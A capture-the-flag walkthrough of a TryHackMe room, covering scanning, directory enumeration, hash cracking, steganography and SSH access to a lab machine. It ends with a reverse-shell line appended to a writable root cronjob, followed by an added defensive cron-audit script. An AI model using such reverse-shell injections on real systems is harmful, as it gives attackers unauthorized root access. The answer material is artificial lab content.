This is a free room created by kral4. The room looks to test one’s basic skills in using tools such as Nmap and GoBuster to locate a hidden directory, gain initial access to a vulnerable machine, and then escalate privileges through a vulnerable cronjob.

For this task, the commands used for Task 2 are provided at the end.

Task 1 - Enumerate with nmap

Enumerate the machine and answer the following questions:

  1. How many ports are open?
  2. What is the version of nginx?
  3. What is running on the highest port?
# Set IP of victim machine.
> victim=10.10.155.79

# Use rustscan to discover ports and pass into nmap for service and version detection
> rustscan -a $victim -r 1-65535 -- -sV
            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.155.79:80
Open 10.10.155.79:6498
Open 10.10.155.79:65524
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:09 UTC
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:09
Scanning 10.10.155.79 [2 ports]
Completed Ping Scan at 19:09, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:09
Completed Parallel DNS resolution of 1 host. at 19:09, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:09
Scanning ip-10-10-155-79.eu-west-1.compute.internal (10.10.155.79) [3 ports]
Discovered open port 65524/tcp on 10.10.155.79
Discovered open port 80/tcp on 10.10.155.79
Discovered open port 6498/tcp on 10.10.155.79
Completed Connect Scan at 19:09, 0.00s elapsed (3 total ports)
Initiating Service scan at 19:09
Scanning 3 services on ip-10-10-155-79.eu-west-1.compute.internal (10.10.155.79)
Completed Service scan at 19:09, 11.03s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.155.79.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:09
Completed NSE at 19:09, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Nmap scan report for ip-10-10-155-79.eu-west-1.compute.internal (10.10.155.79)
Host is up, received syn-ack (0.00058s latency).
Scanned at 2021-05-10 19:09:30 UTC for 12s

PORT      STATE SERVICE REASON  VERSION
80/tcp    open  http    syn-ack nginx 1.16.1
6498/tcp  open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    syn-ack Apache httpd 2.4.43 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds

Task 2 - Compromising the machine

Starting with the nginx web server, we discovered a robots.txt file that didn’t give us any additional information about the website. We can proceed to enumerate the site with gobuster and discover a hidden folder.

A second enumeration inside this folder reveals a second folder. Navigating to it with curl, or checking the page source in a browser, turns up a base64-encoded string. Decoding this string gives us the first flag.


> curl http://$victim/robots.txt      
User-Agent:*
Disallow:/
Robots Not Allowed

# 1st enumeration with gobuster.

> gobuster dir -u http://$victim -w /usr/share/wordlists/dirb/big.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.250.37
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/11 16:25:04 Starting gobuster in directory enumeration mode
===============================================================
/hidden               (Status: 301) [Size: 169] [--> http://10.10.250.37/hidden/]
/robots.txt           (Status: 200) [Size: 43]                                   
===============================================================
2021/05/11 16:26:13 Finished
===============================================================

# 2nd enumeration with gobuster and the hidden folder.

> gobuster dir -u http://$victim/hidden -w /usr/share/wordlists/dirb/big.txt -t 60

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.250.37/hidden
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/11 16:32:49 Starting gobuster in directory enumeration mode
===============================================================
/whatever             (Status: 301) [Size: 169] [--> http://10.10.250.37/hidden/whatever/]
                                                                                          
===============================================================
2021/05/11 16:33:53 Finished
===============================================================

# One liner to find and decode the base64 text
> curl -L http://$victim/hidden/whatever | grep "hidden" | cut -d ">" -f2 | cut -d "<" -f1 | base64 -d

1. Using Gobuster, find flag 1.

Decode the base64 text that is found in a subdirectory of a hidden folder in the nginx service.

Moving on to the Apache web server, we determined that there is a robots.txt file at the root which tells us that the web server expects a User-Agent with a particular ID. As this looks like an MD5 hash, we can attempt to look it up using MD5Hashing.net. This gives us the second flag.

2. Further enumerate the machine, what is flag 2?

Use the online tool to crack the hash.

Going back to our web server, if we navigate to the website using the server’s IP and port, we are shown a standard Apache landing page. However, altering the request with the User-Agent discovered previously will enable us to see a new page with additional information, namely:

  • A base62 encoded string at the top of the page source that can be decoded using CodeChef.
  • Flag 3.

3. Crack the hash with easypeasy.txt, what is flag 3?

This is actually in error. You can just scan the page source for flag 3 without the need to crack the hash.

Decoding the encoded string reveals the hidden directory. If we navigate into it (remember to keep the User-Agent header set in your tool of choice), we should be able to view a hashed string in the page source.

4. What is the hidden directory?

Use your favourite tool to decode the base62 encoded string.

We can use the downloaded Task File that we got at the start of this Task as a key dictionary to crack the hash.

5. Using the wordlist provided to you in this task, crack the hash. What is the password?

Use the downloaded Task File with your favourite cracking tool to crack the hash. Hash uses the GOST Hashing Algorithm.

One would also notice an image file that can be examined for other hidden clues. Converting its binary text to ASCII doesn’t give anything useful. However, examining the image for hidden information shows that a text file is embedded within it. Extracting this hidden text file reveals a username and a binary password that can be converted to ASCII.

6. What is the password to login to the machine via SSH?

Use a binary to ASCII converter on the password in the text file to reveal the password.

Using the username from the text file and the password from the binary conversion, we can ssh into the server. Refer to the initial scan that we performed to identify the correct SSH port. We will be dropped into boring’s home directory where we will have to decode the flag in user.txt using a ROT13.

7. What is the user flag?

Perform a ROT13 on the flag in the user.txt file.

We can upload linpeas.sh to this machine to help us identify potential vulnerabilities we can exploit. From its output, we recognize that a file within /var/www is run by a cronjob. Inserting a reverse shell command into this file and setting up a listener on our attacking machine will give us a new shell on the victim with root privileges. We can then proceed to find the root flag to complete the room.

8. What is the root flag?

Examine the contents in the /root/.root.txt file.

# Acquiring the user agent

> curl http://$victim:65524/robots.txt

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

# Extracting the encoded text at the top of the page

> curl -H "User-Agent: a18672860d0510e5ab6699730763b250" http://$victim:65524/ | egrep "hidden" | cut -d ":" -f2 | cut -d "<" -f1

# Extracting the flag within the source

> curl -H "User-Agent: a18672860d0510e5ab6699730763b250" http://$victim:65524/ | egrep "flag\{" | cut -d ":" -f2

# Acquiring the hash from the hidden directory

> curl -L -H "User-Agent: a18672860d0510e5ab6699730763b250" http://$victim:65524/n0th1ng3ls3m4tt3r | grep  -oP '<p>\K.*(?=</p>)' 

# Cracking hash using wordlist from start of Task 2

> hashcat -m 6900 -a 0 [Hash from hidden directory here] easypeasyfiles.txt 

# Examining the image (index.jpg) for any hidden files

> steghide info index.jpg

"index.jpeg":
  format: jpeg
  capacity: 4.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "secrettext.txt":
    size: 278.0 Byte
    encrypted: no
    compressed: no

# Extracting secrettext.txt from image

> steghide extract -sf index.jpg
Enter passphrase:                                                                                     
wrote extracted data to "secrettext.txt". 

# Convert binary password to ascii

> cat secrettext.txt | tail -n 1 | ascii2binary -b b 

# Login and perform a ROT13 on the encoded flag.

> cat user.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'

# Insert a reverse shell into the /var/www/.mysecretcronjob.sh

> echo "bash -c 'exec bash -i &>/dev/tcp/[ATTACKER IP]/[ATTACKER PORT] <&1'" >> /var/www/.mysecretcronjob.sh

# You can then set up a reverse shell listener and gain a root shell to the victim machine.
# Proceed to navigate to the root directory 

> ls -la | grep "txt"
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
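The cronjob above is only exploitable because a script that root runs on a schedule is writable by an unprivileged user. The following is an added defender-side check, not part of the original writeup: it reads crontab-format lines, finds the script each entry executes, and reports any file whose group or other write bit is set. The crontab and scripts are constructed in a temporary directory for the demo; the file name .mysecretcronjob.sh is borrowed from the room, and the other paths are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): audit cron entries for
# root-run scripts that non-root users could modify.

# Read crontab-format lines ("min hour dom mon dow user command ...") from
# the file in $1. For each line, take the first absolute path in the command
# as the script being run, and print "WRITABLE <path> mode=<octal>" when the
# file's group or other write bit is set (chmod 777, 666, 775 ...).
audit_cron_lines() {
  local line field path mode
  while IFS= read -r line; do
    case "$line" in ''|\#*) continue ;; esac   # skip blanks and comments
    path=""
    for field in $line; do
      case "$field" in /*) path="$field"; break ;; esac
    done
    [ -n "$path" ] && [ -f "$path" ] || continue   # no regular file to check
    mode=$(stat -c '%a' "$path")                   # GNU stat, e.g. 777
    if [ $(( 8#$mode & 8#022 )) -ne 0 ]; then
      printf 'WRITABLE %s mode=%s\n' "$path" "$mode"
    fi
  done < "$1"
}

# Constructed sample: one locked-down script and one world-writable script
# (the latter mirrors /var/www/.mysecretcronjob.sh from the room), both
# scheduled as root. Prints the audit output and returns 0 only if exactly
# the weak script is flagged.
demo_cron_audit() {
  local tmp out
  tmp=$(mktemp -d)
  printf '#!/bin/sh\necho safe\n' > "$tmp/backup.sh"
  chmod 755 "$tmp/backup.sh"
  printf '#!/bin/sh\necho weak\n' > "$tmp/.mysecretcronjob.sh"
  chmod 777 "$tmp/.mysecretcronjob.sh"
  printf '# m h dom mon dow user command\n*/1 * * * * root %s\n0 3 * * * root %s > /dev/null 2>&1\n' \
    "$tmp/.mysecretcronjob.sh" "$tmp/backup.sh" > "$tmp/crontab"
  out=$(audit_cron_lines "$tmp/crontab")
  rm -rf "$tmp"
  printf '%s\n' "$out"
  [ "$(printf '%s\n' "$out" | grep -c '^WRITABLE ')" -eq 1 ] \
    && printf '%s\n' "$out" | grep -q '/.mysecretcronjob.sh mode=777$'
}

demo_cron_audit
```

On a real host, point audit_cron_lines at /etc/crontab and the files under /etc/cron.d; the same test (a root-scheduled script with mode 777) is what let the room's cronjob be hijacked.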